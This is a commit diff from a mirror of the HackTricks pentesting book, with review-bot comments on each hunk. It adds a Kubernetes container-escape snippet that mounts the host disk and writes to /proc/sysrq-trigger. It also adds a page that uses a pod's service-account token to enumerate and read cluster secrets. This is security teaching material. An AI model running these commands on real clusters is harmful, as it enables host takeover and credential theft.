mirror of https://github.com/carlospolop/hacktricks.git synced 2023-12-14 19:12:55 +01:00

GitBook: [master] 5 pages modified

This commit is contained in:
CPol 2021-04-27 23:18:16 +00:00 committed by gitbook-bot
parent f5ddae9e27
commit 9d55f28064
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
4 changed files with 154 additions and 13 deletions

View file

@ -170,7 +170,8 @@
* [Print Job Retention](pentesting/pentesting-printers/print-job-retention.md)
* [Scanner and Fax](pentesting/pentesting-printers/scanner-and-fax.md)
* [Pentesting SAP](pentesting/pentesting-sap.md)
* [Pentesting Kubernetes](pentesting/pentesting-kubernetes.md)
* [Pentesting Kubernetes](pentesting/pentesting-kubernetes/README.md)
* [Enumeration from a Pod](pentesting/pentesting-kubernetes/enumeration-from-a-pod.md)
* [7/tcp/udp - Pentesting Echo](pentesting/7-tcp-udp-pentesting-echo.md)
* [21 - Pentesting FTP](pentesting/pentesting-ftp/README.md)
* [FTP Bounce attack - Scan](pentesting/pentesting-ftp/ftp-bounce-attack.md)
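Review bot: The SUMMARY entry for Pentesting Kubernetes now points at `pentesting/pentesting-kubernetes/README.md` instead of `pentesting/pentesting-kubernetes.md`, so the old page path leaves the table of contents; any other link in the book that still targets the old `.md` path will break and should be grepped for, since no redirect entry for it is part of this change. The new child entry `Enumeration from a Pod` is nested one level under it, which matches the new directory layout.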

View file

@ -470,6 +470,24 @@ capsh --print
#You can abuse the SYS_MODULE capability
```
## Writable hostPath Mount
\(Info from [**here**](https://medium.com/swlh/kubernetes-attack-path-part-2-post-initial-access-1e27aabda36d)\) Within the container, an attacker may attempt to gain further access to the underlying host OS via a writable hostPath volume created by the cluster. Below is some common things you can check within the container to see if you leverage this attacker vector:
```bash
#### Check if You Can Write to a File-system
$ echo 1 > /proc/sysrq-trigger
#### Check root UUID
$ cat /proc/cmdlineBOOT_IMAGE=/boot/vmlinuz-4.4.0-197-generic root=UUID=b2e62f4f-d338-470e-9ae7-4fc0e014858c ro console=tty1 console=ttyS0 earlyprintk=ttyS0 rootdelay=300- Check Underlying Host Filesystem
$ findfs UUID=<UUID Value>/dev/sda1- Attempt to Mount the Host's Filesystem
$ mkdir /mnt-test
$ mount /dev/sda1 /mnt-testmount: /mnt: permission denied. ---> Failed! but if not, you may have access to the underlying host OS file-system now.
#### debugfs (Interactive File System Debugger)
$ debugfs /dev/sda1
```
## Seccomp in Docker
This is not a technique to breakout from a Docker container but a security feature that Docker uses and you should know about as it might prevent you from breaking out from docker:
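Review bot: The commands under the new `Writable hostPath Mount` heading do not check for a writable hostPath volume; they test whether the container can mount the host's root block device (`findfs UUID=...`, `mount /dev/sda1 /mnt-test`, `debugfs /dev/sda1`), which depends on the container being privileged or holding CAP_SYS_ADMIN with access to `/dev/sda1`, not on a hostPath mount. A hostPath check would instead inspect `/proc/mounts` for paths backed by the host's device rather than the overlay filesystem, so either rename the section or add that check. The line labelled `#### Check if You Can Write to a File-system` runs `echo 1 > /proc/sysrq-trigger`, which writes to the kernel SysRq trigger (a host-wide action, here changing the console log level) rather than testing filesystem writability; relabel it as a test of write access to `/proc/sysrq-trigger`, i.e. whether `/proc` is writable from an unconfined container. The command lines and their sample output are also run together (`cat /proc/cmdlineBOOT_IMAGE=...`, `findfs UUID=<UUID Value>/dev/sda1- Attempt to Mount...`, `mount /dev/sda1 /mnt-testmount: /mnt: permission denied.`), so the block needs reflowing with output on its own lines before merging.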

View file

@ -29,7 +29,7 @@ Security tips for Kubernetes
* **Pod**: Wrapper around a container or multiple containers with. A pod should only contain one application \(so usually, a pod run just 1 container\). The pod is the way kubernetes abstracts the container technology running.
* **Service**: Each pod has 1 internal **IP address** from the internal range of the node. However, it can be also exposed via a service. The **service has also an IP address** and its goal is to maintain the communication between pods so if one dies the **new replacement** \(with a different internal IP\) **will be accessible** exposed in the **same IP of the service**. It can be configured as internal or external. The service also actuates as a **load balancer when 2 pods are connected** to the same service. When a **service** is **created** you can find the endpoints of each service running `kubectl get endpoints`
![](../.gitbook/assets/image%20%28466%29.png)
![](../../.gitbook/assets/image%20%28466%29.png)
* **Kubelet**: Primary node agent. The component that establishes communication between node and kubectl, and only can run pods \(through API server\). The kubelet doesnt manage containers that were not created by Kubernetes.
* **Kube-proxy**: is the service in charge of the communications \(services\) between the apiserver and the node. The base is an IPtables for nodes. Most experienced users could install other kube-proxies from other vendors.
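Review bot: The image path change from `../.gitbook/assets/...` to `../../.gitbook/assets/...` is the correct adjustment for the page moving from `pentesting/pentesting-kubernetes.md` to `pentesting/pentesting-kubernetes/README.md` (see the SUMMARY change above). The same fix applies to every `../.gitbook` reference in the page; two more are handled in the later hunks, so it is worth grepping the file for any remaining ones. Unrelated to this change, the Kube-proxy context line ("The base is an IPtables for nodes") is garbled and could be tidied in a follow-up.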
@ -155,7 +155,7 @@ kubectl apply -f deployment.yml
Each configuration file has 3 parts: **metadata**, **specification** \(what need to be launch\), **status** \(desired state\).
Inside the specification of the deployment configuration file you can find the template defined with a new configuration structure defining the image to run:
![](../.gitbook/assets/image%20%28458%29.png)
![](../../.gitbook/assets/image%20%28458%29.png)
#### Example of Deployment + Service declared in the same configuration file \(from [here](https://gitlab.com/nanuchi/youtube-tutorial-series/-/blob/master/demo-kubernetes-components/mongo.yaml)\)
@ -346,10 +346,14 @@ helm search <keyword>
Helm is also a template engine that allows to generate config files with variables:
![](../.gitbook/assets/image%20%28465%29.png)
![](../../.gitbook/assets/image%20%28465%29.png)
## PART 2 - VULNERABILITIES and some fixes.
### Enumeration inside a Pod
{% page-ref page="enumeration-from-a-pod.md" %}
### Vulnerabilities - kubernetes secrets
A Secret is an object that contains sensitive data such as a password, a token or a key. Such information might otherwise be put in a Pod specification or in an image. Users can create Secrets and the system also creates Secrets. The name of a Secret object must be a valid **DNS subdomain name**.
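Review bot: The new `{% page-ref page="enumeration-from-a-pod.md" %}` is relative to the README's new directory and matches the SUMMARY entry `pentesting/pentesting-kubernetes/enumeration-from-a-pod.md`, so the link resolves. Placement is the one thing to reconsider: `### Enumeration inside a Pod` sits under `## PART 2 - VULNERABILITIES and some fixes.`, but the linked page is post-compromise enumeration rather than a vulnerability, so it would fit better as its own section before PART 2 or under a post-exploitation heading.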
@ -632,7 +636,7 @@ kubectl get secret test-secret -oyaml
Do not forget to delete de secrets and re-create them again in order to apply the encryption layer.
### Final tips:
#### Final tips:
* Try not to keep secrets in the FS, get them from other places.
* Check out [https://www.vaultproject.io/](https://www.vaultproject.io/) for add more protection to your secrets.
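Review bot: Demoting `### Final tips:` to `#### Final tips:` makes it a sub-heading of the secrets section, consistent with the neighbouring `####` headings; the trailing colon in the heading could go at the same time. The context line just above it, `delete de secrets` (typo for `the`), is untouched by this change but is right there to fix.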
@ -656,14 +660,7 @@ kubectl exec pod -it -- bash
Once inside the container:
```text
root@pod01:/# uname -r
```
If you want to gather information you could use:
```text
strace uname -r
ltrace uname -r
uname -r
```
When the attack achieves discovering the kernel version, he could run exploiting techniques to gather information or escalate into the OS.
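Review bot: The hunk header (`-656,14 +660,7`) shows seven lines removed and none added; the rendered diff does not mark which lines went, but if it is the `strace uname -r` / `ltrace uname -r` block, dropping it is the right call: tracing the `uname` binary only shows its own syscalls and library calls and reveals nothing about the host kernel beyond what `uname -r` (or `cat /proc/version`) already prints. The remaining context line "When the attack achieves discovering the kernel version, he could run exploiting techniques to gather information or escalate into the OS" would read better as "Once the attacker knows the kernel version, they can look for a matching kernel exploit to escalate to the host."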

View file

@ -0,0 +1,125 @@
# Enumeration from a Pod
## Enumeration
In a situation where you have managed to break into a Kubernetes Pod you could start enumerating the kubernetes environment from within.
Usually in the directory `/run/secrets/kubernetes.io/serviceaccount` or `/var/run/secrets/kubernetes.io/serviceaccount` you can find the files:
* **ca.crt**: It's the ca certificate to check kubernetes communications
* **namespace**: It indicates the current namespace
* **token**: It contains the auth token of the current pod.
To enumerate the environment you can upload the [**kubectl**](https://kubernetes.io/es/docs/tasks/tools/install-kubectl/) binary and use it. Also, using the **token** obtained before you can manually access some endpoints of the **API Server**.
In order to find the the IP of the API service check the environment for a variable called `KUBERNETES_SERVICE_HOST`.
### Get namespaces
{% tabs %}
{% tab title="kubectl" %}
```bash
./kubectl get namespaces
```
{% endtab %}
{% tab title="API" %}
```bash
curl -v -H "Authorization: Bearer <jwt_token>" \
https://<Kubernetes_API_IP>:<port>/api/v1/namespaces/
```
{% endtab %}
{% endtabs %}
### Get Current Privileges
{% tabs %}
{% tab title="kubectl" %}
```bash
./kubectl auth can-i --list #Get privileges in current namespace
./kubectl auth can-i --list -n custnamespace #Get privileves in custnamespace
```
{% endtab %}
{% endtabs %}
### Get secrets
{% tabs %}
{% tab title="kubectl" %}
```text
./kubectl get secrets
./kubectl get secrets -n custnamespace
```
{% endtab %}
{% tab title="API" %}
```bash
curl -v -H "Authorization: Bearer <jwt_token>" \
https://<Kubernetes_API_IP>:<port>/api/v1/namespaces/default/secrets/
curl -v -H "Authorization: Bearer <jwt_token>" \
https://<Kubernetes_API_IP>:<port>/api/v1/namespaces/custnamespace/secrets/
```
{% endtab %}
{% endtabs %}
### Get deployments
{% tabs %}
{% tab title="kubectl" %}
```text
./kubectl get deployments
./kubectl get deployments -n custnamespace
```
{% endtab %}
{% tab title="API" %}
```bash
curl -v -H "Authorization: Bearer <jwt_token>" \
https://<Kubernetes_API_IP>:<port>/api/v1/namespaces/default/deployments/
curl -v -H "Authorization: Bearer <jwt_token>" \
https://<Kubernetes_API_IP>:<port>/api/v1/namespaces/custnamespace/deployments/
```
{% endtab %}
{% endtabs %}
### Get deployments
{% tabs %}
{% tab title="kubectl" %}
```text
./kubectl get pods
./kubectl get pods -n custnamespace
```
{% endtab %}
{% tab title="API" %}
```bash
curl -v -H "Authorization: Bearer <jwt_token>" \
https://<Kubernetes_API_IP>:<port>/api/v1/namespaces/default/pods/
curl -v -H "Authorization: Bearer <jwt_token>" \
https://<Kubernetes_API_IP>:<port>/api/v1/namespaces/custnamespace/pods/
```
{% endtab %}
{% endtabs %}
### Get deployments
{% tabs %}
{% tab title="kubectl" %}
```text
./kubectl get nodes
```
{% endtab %}
{% tab title="API" %}
```bash
curl -v -H "Authorization: Bearer <jwt_token>" \
https://<Kubernetes_API_IP>:<port>/api/v1/nodes/
```
{% endtab %}
{% endtabs %}
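Review bot: Two headings in the new page are copy-paste errors: the section listing `./kubectl get pods` (and `/api/v1/namespaces/.../pods/`) and the section listing `./kubectl get nodes` (and `/api/v1/nodes/`) are both titled `### Get deployments`; rename them `### Get pods` and `### Get nodes`. The curl examples send the bearer token to `https://<Kubernetes_API_IP>:<port>` without a CA; since the page already points at `ca.crt` in the serviceaccount directory, add `--cacert /run/secrets/kubernetes.io/serviceaccount/ca.crt` rather than leaving readers to reach for `-k`, and mention that the port is in `KUBERNETES_SERVICE_PORT` alongside the `KUBERNETES_SERVICE_HOST` variable already cited. The `namespace` file from the same directory is the natural default for the `-n` argument and the `/namespaces/<ns>/` path segment instead of hard-coding `default`. `Get Current Privileges` has no API tab; the equivalent is a POST of a `SelfSubjectRulesReview` to `/apis/authorization.k8s.io/v1/selfsubjectrulesreviews` with `spec.namespace` set. Minor: `privileves` typo in the `can-i` comment, the kubectl link goes to the Spanish docs path (`kubernetes.io/es/docs/...`), and the kubectl tabs alternate between ```text and ```bash fences and should be uniform.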